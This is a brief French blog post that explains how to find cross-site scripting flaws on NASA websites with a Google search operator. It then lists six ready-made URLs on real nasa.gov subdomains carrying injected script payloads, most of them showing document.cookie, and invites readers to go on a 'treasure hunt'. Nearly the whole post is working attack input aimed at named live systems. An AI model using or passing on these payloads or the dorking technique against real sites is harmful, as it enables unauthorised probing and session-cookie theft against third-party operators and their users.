__ __ _____ _____ _ _ _____
\ \ / // ____/ ____| | \ | | /\ / ____| /\
\ V /| (___| (___ | \| | / \ | (___ / \
> < \___ \\___ \ | . ` | / /\ \ \___ \ / /\ \
/ . \ ____) |___) | | |\ |/ ____ \ ____) / ____ \
/_/ \_\_____/_____/ |_| \_/_/ \_\_____/_/ \_\
#How to find XSS in NASA?
Non le titre n'est pas racoleur! Une simple recherche google permet de trouver des vulnérabilités XSS sur les sites de la NASA. Comment? Avec cette simple recherche : inurl:”tinkode” (et oui, encore lui!)
Cliquez sur le lien (ou en accès direct ici) et vous obtiendrez une jolie boite d'avertissement. Et oui ... google référence les vulnérabilités XSS. Étonnant non?
Ici une autre liste de page de la NASA vulnérables :
1. http://uavsar.jpl.nasa.gov/cgi-bin/data.pl?itext=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
2. http://hitf.jsc.nasa.gov/hitfpub/redirect.cfm?location=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
3. http://sbir.gsfc.nasa.gov/sbirweb/search/searchResults.jsp?st=%22%3E%3Cscript%3Ealert(/c0de.breaker/)%3C/script%3E4. http://nmp.jpl.nasa.gov/ds2/search/search.pl?Range=All&Format=Standard&Terms=1%3Cscript%3Ealert(document.cookie)%3C/script%3E
5. http://pims.grc.nasa.gov/calendars/qs_roadmap_index.php?year=”>alert(/c0de.breaker/)
6. http://starbeam.jpl.nasa.gov/tools/text-search/results.jsp?query=alert(document.cookie)
On joue à la chasse au trésor?
0 commentaires:
Enregistrer un commentaire